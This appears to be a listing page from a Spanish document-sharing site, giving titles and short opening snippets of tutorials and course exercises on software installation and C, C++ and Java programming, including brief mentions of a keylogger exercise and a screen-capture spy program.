ATLAS MANUAL DE USUARIO DEL INSTALADOR INNO SETUP 5 Versión 1.0 UNIDAD DE ARQUITECTURA DE SOFTWARE DE APLICACIONES ATLAS MANUAL DE USUARIO DEL INSTALADOR INNO SETUP 5 Versión 1.0 UNIDAD DE ARQUITECTURA DE SOFTWARE DE APLICACIONES Hoja de Control Título MANUAL DE USO DEL INSTALADOR INNO SETUP 5 Documento de Referencia

Más detalles

Práctica 3ProgramacionRS232: Programación básica de la RS232

Práctica 3ProgramacionRS232: Programación básica de la RS232 Práctica 3ProgramacionRS232: Programación básica de la RS232 1 Objetivos El objetivo de esta práctica es la iniciación del alumno en la programación de las comunicaciones en un entorno de desarrollo basado

Más detalles

Instalación de Tomcat7 en Ubuntu

Instalación de Tomcat7 en Ubuntu 2. Instala el servidor web java TomCat en Windows y Linux. Documenta los módulos/servicios necesarios. Instala el CMS Java Liferay. Documenta el proceso. Instalación de Tomcat7 en Ubuntu Comenzamos instalando

Más detalles

INSTALACION MANUAL DE ECLIPSE EN UBUNTU

INSTALACION MANUAL DE ECLIPSE EN UBUNTU INSTALACION MANUAL DE ECLIPSE EN UBUNTU Objetivos: Pasar correctamente un programa escrito en Pseudocódigo a C. Editar, compilar y comprobar el funcionamiento de programas usando un IDE. Resumen Cuando

Más detalles

Instalación y Administración de un servidor VNC en Linux Ubuntu y un cliente en Windows.

Instalación y Administración de un servidor VNC en Linux Ubuntu y un cliente en Windows. Instalación y Administración de un servidor VNC en Linux Ubuntu y un cliente en Windows. En esta práctica se pretende instalar y administrar un servidor VNC en Linux y un cliente VNC Windows. Con lo cual,

Más detalles

Instituto Tecnológico de Las Américas (ITLA)

Instituto Tecnológico de Las Américas (ITLA) Instituto Tecnológico de Las Américas (ITLA) Nombre: Gregori Carmona Lorenzo ID: 2011-2435 Asignatura: Sistemas Operativos III Instructor: José Doñe Tema: Practica extra: Apache Un servidor web es un programa

Más detalles

Este taller estará orientado a aquellas personas que no han visto jamás Python y también a aquellos que quieran pasar de Python 2 al 3

Este taller estará orientado a aquellas personas que no han visto jamás Python y también a aquellos que quieran pasar de Python 2 al 3 Introducción En este taller veremos las novedades sobre Python 3, que cosas nuevas e interesantes trae, que lo diferencia con Python 2, a demás conoceremos los depuradores que trae. Miraremos por arriba

Más detalles

!! Identificar las señales que llegan a la consola.

!! Identificar las señales que llegan a la consola. Objetivos TEMA 9 Gestión de Errores y Excepciones!! Describir el mecanismo de gestión de señales en Windows API y la gestión de excepciones.!! Identificar las señales que llegan a la consola. Estudio de

Más detalles

Lenguajes de Programación Curso 04-05. Práctica 4. Herencia. Utilización de interfaces y clases abstractas. 1. Interfaces 1. 2. Clases abstractas 2

Lenguajes de Programación Curso 04-05. Práctica 4. Herencia. Utilización de interfaces y clases abstractas. 1. Interfaces 1. 2. Clases abstractas 2 Objetivos Herencia. Utilización de interfaces y clases abstractas. Índice 1. Interfaces 1 2. Clases abstractas 2 3. Collections Framework 3 3.1. Collection........................................... 3

Más detalles

Obtener un backup de los diagramas lógicos de cualquier ES sobre dbkopie y el listado de todos esos diagramas lógicos del FUP Editor y de OM en pdf.

Obtener un backup de los diagramas lógicos de cualquier ES sobre dbkopie y el listado de todos esos diagramas lógicos del FUP Editor y de OM en pdf. Obtener un backup de los diagramas lógicos de cualquier ES sobre dbkopie y el listado de todos esos diagramas lógicos del FUP Editor y de OM en pdf. Cada cierto tiempo merece la pena tener actualizado

Más detalles

DOCUMENTACIÓN DEL PROGRAMA

DOCUMENTACIÓN DEL PROGRAMA DOCUMENTACIÓN DEL PROGRAMA 1. Qué es exactamente el Espía 2004? 1.1 Funcionamiento del programa 2. Configuración del servidor 2.1 Capturar imágenes de la pantalla 2.1.1 Captura Inteligente 2.2 Capturar

Más detalles

FACULTAD DE INGENIERÍA

FACULTAD DE INGENIERÍA NOMBRE DEL PROFESOR: Ing. Héctor Manuel Quej Cosgaya NOMBRE DE LA PRÁCTICA: Variables y Tipos de Datos PRÁCTICA NÚM. [ 1 ] LABORATORIO: MATERIA: UNIDAD: TIEMPO: Centro de Ingeniería Computacional Lenguaje

Más detalles

Práctica 2: Simón dice

Práctica 2: Simón dice Práctica 2: Simón dice Fecha de entrega: 31 de enero de 2016 0.- Descripción del juego (Wikipedia.org) Simon dice es un juego electrónico, creado por Ralph Baer, que consiste en reproducir una secuencia

Más detalles

Tema 2. Memoria Dinámica. 2.1 Datos estáticos y dinámicos

Tema 2. Memoria Dinámica. 2.1 Datos estáticos y dinámicos Tema 2 Memoria Dinámica 2.1 Datos estáticos y dinámicos Datos estáticos: su tamaño y forma es constante durante la ejecución de un programa y por tanto se determinan en tiempo de compilación. El ejemplo

Más detalles

Manual del Taller de Dropbox. Manual para el Taller de Dropbox

Manual del Taller de Dropbox. Manual para el Taller de Dropbox Manual para el Taller de Dropbox Índice. Objetivos de aprendizaje 2 Dropbox. 2 Crear una cuenta en Dropbox 3 Instalar la aplicación de escritorio de Dropbox.. 4 Agregar archivos en Dropbox. 7 Crear carpetas

Más detalles

Paso de Borland Turbo C (bajo DOS) a Anjuta (Linux) 1.

Paso de Borland Turbo C (bajo DOS) a Anjuta (Linux) 1. Paso de Borland Turbo C (bajo DOS) a Anjuta (Linux) 1. Anjuta es un entorno de desarrollo de C que podemos encontrar en cualquier distribución de GNU/Linux. Si nuestra distribución no dispone de ella,

Más detalles

Hot Potatoes, aplicaciones educativas

Hot Potatoes, aplicaciones educativas Hot Potatoes, aplicaciones educativas Módulo 2: Instalación e idioma ÍNDICE MÓDULO 2. INSTALACIÓN E IDIOMA...1 Instalación y registro...2 Descarga en línea...3 Instalación...5 Instalación en Windows...6

Más detalles

DreamWeaver. CS5 y CS6. Cursosindustriales. Curso de DreamWeaver CS6 1

DreamWeaver. CS5 y CS6. Cursosindustriales. Curso de DreamWeaver CS6 1 DreamWeaver CS5 y CS6 Cursosindustriales. Curso de DreamWeaver CS6 1 DREAMWEAVER CS5. DISEÑO DE PÁGINAS DINÁMICAS. En esta segunda sección de diseño de páginas Web con Dreamweaver CS, vamos a hablar sobre

Más detalles

EXAMEN FINAL. Virtual. P C v i r t u a l

EXAMEN FINAL. Virtual. P C v i r t u a l EXAMEN FINAL Realizar una configuración de una Red LAN, donde la computadora que hará el papel de servidor tenga instalado un software libre y haya una PC real y otra PC virtual. La PC real contara con

Más detalles

Tema: INTÉRPRETE ENSAMPOCO/3

Tema: INTÉRPRETE ENSAMPOCO/3 Compiladores. Guía 11 1 Facultad: Ingeniería Escuela: Computación Asignatura: Compiladores Tema: INTÉRPRETE ENSAMPOCO/3 Contenido En esta práctica se desarrollará un intérprete de lenguaje ENSAMPOCO/3

Más detalles

Plan de mantenimiento. NetSupport ServiceDesk

Plan de mantenimiento. NetSupport ServiceDesk Plan de mantenimiento NetSupport ServiceDesk para un funcionamiento óptimo TotemGuard.com 1 902 360 645 Índice INTRODUCCION...3 PLAN DE MANTENIMIENTO...4 1. Copia de seguridad (automática)...4 2. Programación

Más detalles

Mi primer proyecto en Dev-C++

Mi primer proyecto en Dev-C++ Mi primer proyecto en Dev-C++ Para realizar esta actividad deberás disponer de un ordenador en el que esté instalado el Dev-C++. Debes ir realizando cada uno de los pasos indicados, en el mismo orden en

Más detalles

En cualquier caso, tampoco es demasiado importante el significado de la "B", si es que lo tiene, lo interesante realmente es el algoritmo.

En cualquier caso, tampoco es demasiado importante el significado de la B, si es que lo tiene, lo interesante realmente es el algoritmo. Arboles-B Características Los árboles-b son árboles de búsqueda. La "B" probablemente se debe a que el algoritmo fue desarrollado por "Rudolf Bayer" y "Eduard M. McCreight", que trabajan para la empresa

Más detalles

Reglas básicas de la programación en lenguaje C

Reglas básicas de la programación en lenguaje C 0. Introducción Reglas básicas de la programación en lenguaje C ISO - SO Departament d'arquitectura de Computadors Universitat Politècnica de Catalunya C es un lenguaje de programación de propósito general.

Más detalles

Si el fichero hashes existe, el script debe notificar el error y salir como corresponde. A continuación se muestra un ejemplo:

Si el fichero hashes existe, el script debe notificar el error y salir como corresponde. A continuación se muestra un ejemplo: Examen de Sistemas Operativos ITIS Fuenlabrada Junio 2009 Tiempo total: 3 horas. Problema: Llamadas al sistema (5 puntos) Escriba en C para Plan 9 un programa llamado catsha1 cuyo propósito es crear un

Más detalles

Programación básica C++

Programación básica C++ Programación en Lenguaje C++ Programación básica C++ 6.3.1 Declaración de variables Introducción 6 Las variables sirven para identificar un determinado valor. Es importante tener en cuenta, que una variable

Más detalles

Unidad III El lenguaje de programación C 1. 2. 3. 4. 5. 6. 7. 8.

Unidad III El lenguaje de programación C 1. 2. 3. 4. 5. 6. 7. 8. Unidad III 1. Introducción. 2. Breve historia del C. 3. Lenguajes de programación de alto nivel, bajo nivel y nivel medio. 4. Compiladores e intérpretes. 5. Compilación, enlace y generación de un programa

Más detalles

Jorge García Delgado. 1.e.2 Uso del keylogger, Reveal Keylogger

Jorge García Delgado. 1.e.2 Uso del keylogger, Reveal Keylogger 1.e.1.- Introducción Un keylogger es un tipo de software o un dispositivo hardware específico que se encarga de registrar las pulsaciones que se realizan en el teclado, para posteriormente memorizarlas

Más detalles

www.aprendoencasa.com Curso Introducción JAVA Pág.: 1

www.aprendoencasa.com Curso Introducción JAVA Pág.: 1 www.aprendoencasa.com Curso Introducción JAVA Pág.: 1 Introducción Java es un lenguaje basado en la programación orientada a objetos (POO), este tipo de programación va más allá del tipo de programación

Más detalles

Entrada y salida de datos en C y C++

Entrada y salida de datos en C y C++ Universidad Nacional de Rosario Facultad de Ciencias Exactas, Ingeniería y Agrimensura Escuela de Ingeniería Electrónica Cátedra de Informática II Entrada y salida de datos en C y C++ Informática II Entrada/Salida

Más detalles

Instalación de un servidor de correo

Instalación de un servidor de correo 1 de 8 Ver índice Instalación de un servidor de correo Un servidor de correo El servidor de correo Mercury Mail puede descargarse www.pmail.com o bien instalar directamente el fichero m32-462.exe que encontrarás

Más detalles

PROYECTO MIS IMÁGENES,

PROYECTO MIS IMÁGENES, Jose Ignacio González Gómez. Departamento de Economía Financiera y Contabilidad Universidad de La Laguna www.jggomez.eu Tema: Script para subir ficheros a través de un formulario y almacenar otros campos

Más detalles

Examen final de CL 11 de Enero de 2012 Fecha de publicación de notas: 19-1-2012 Fecha de revisión: 20-1-2012

Examen final de CL 11 de Enero de 2012 Fecha de publicación de notas: 19-1-2012 Fecha de revisión: 20-1-2012 Examen final de CL 11 de Enero de 2012 Fecha de publicación de notas: 19-1-2012 Fecha de revisión: 20-1-2012 Sin apuntes. Tiemp: 3h. Nombre y Apellidos: Problema de analisis léxico, sintáctico e intérpretes

Más detalles

Problemas de Redes de Computadores. Ingeniería Técnica en Informática de Gestión Conjunto de problemas 1

Problemas de Redes de Computadores. Ingeniería Técnica en Informática de Gestión Conjunto de problemas 1 Problemas de Redes de Computadores. Ingeniería Técnica en Informática de Gestión Conjunto de problemas 1 Preguntas cortas Pregunta 1.1: Si configuro mi servidor Web para que no acepte conexiones desde

Más detalles

Tutorial BMS Server Studio UDP

Tutorial BMS Server Studio UDP Tutorial BMS Server Studio UDP ÍNDICE Página 0. Introducción...3 1. Configuración del puerto UDP...4 2. Ejemplos...6 2.1 Configuración manual...6 2.1.1 Configuración SocketTest...6 2.1.2 Configuración

Más detalles

TEMA 1: SISTEMAS INFORMÁTICOS. Parte 2: representación de la información

TEMA 1: SISTEMAS INFORMÁTICOS. Parte 2: representación de la información TEMA 1: SISTEMAS INFORMÁTICOS Parte 2: representación de la información Qué vamos a ver? Cómo se representa y almacena la información en un ordenador Cómo podemos relacionar la información que entendemos

Más detalles

Prof. Dr. Paul Bustamante

Prof. Dr. Paul Bustamante Prácticas de C++ Practica Nº 5 Informática II Fundamentos de Programación Prof. Dr. Paul Bustamante Practica Nº 5 Programación en C++ Pág. 1 ÍNDICE ÍNDICE... 1 1. Introducción... 1 1.1 Ejercicio 1: Mi

Más detalles

RESUMEN DE CONCEPTOS BASICOS DE PROGRAMACION JAVA

RESUMEN DE CONCEPTOS BASICOS DE PROGRAMACION JAVA UNED Centro Asociado de Cádiz RESUMEN DE CONCEPTOS BASICOS DE PROGRAMACION JAVA 1. OBJETOS Cualquier elemento del programa es un objeto. Un programa es un conjunto de objetos que se comunican entre sí

Más detalles

Capitulo 12. Tira de bits

Capitulo 12. Tira de bits Capitulo 12. Tira de bits 12.1 Representación de números naturales (enteros positivos) base 10 base 2 base 16 decimal binario hexadecimal 0 0 0 1 1 1 2 10 2 3 11 3 4 100 4 5 101 5 6 110 6 7 111 7 8 1000

Más detalles

Tema 7 Vectores y cadenas de caracteres. Fundamentos de Informática

Tema 7 Vectores y cadenas de caracteres. Fundamentos de Informática Tema 7 Fundamentos de Informática Índice 1. Qué es un vector? 2. Vectores unidimensionales 3. Cadenas de caracteres 4. Paso de vectores unidimensionales a funciones. 5. Vectores multidimensionales: matrices

Más detalles

Tema: PROCEDIMIENTOS ALMACENADOS.

Tema: PROCEDIMIENTOS ALMACENADOS. Base de datos I. Guía 9 1 Facultad: Ingeniería Escuela: Computación Asignatura: Base de datos I Tema: PROCEDIMIENTOS ALMACENADOS. Objetivo Específico Conocer la sintaxis de un procedimiento almacenado

Más detalles

UNIDAD DIDACTICA 15 CONVERTIR UN EQUIPO LINUX SERVER EN CONTROLADOR DE DOMINIO

UNIDAD DIDACTICA 15 CONVERTIR UN EQUIPO LINUX SERVER EN CONTROLADOR DE DOMINIO UNIDAD DIDACTICA 15 CONVERTIR UN EQUIPO LINUX SERVER EN CONTROLADOR DE DOMINIO Eduard Lara 1 1. CONVERTIR UN LINUX SERVER EN CONTROLADOR DE DOMINIO En Linux Server, a diferencia de Windows Server, no existe

Más detalles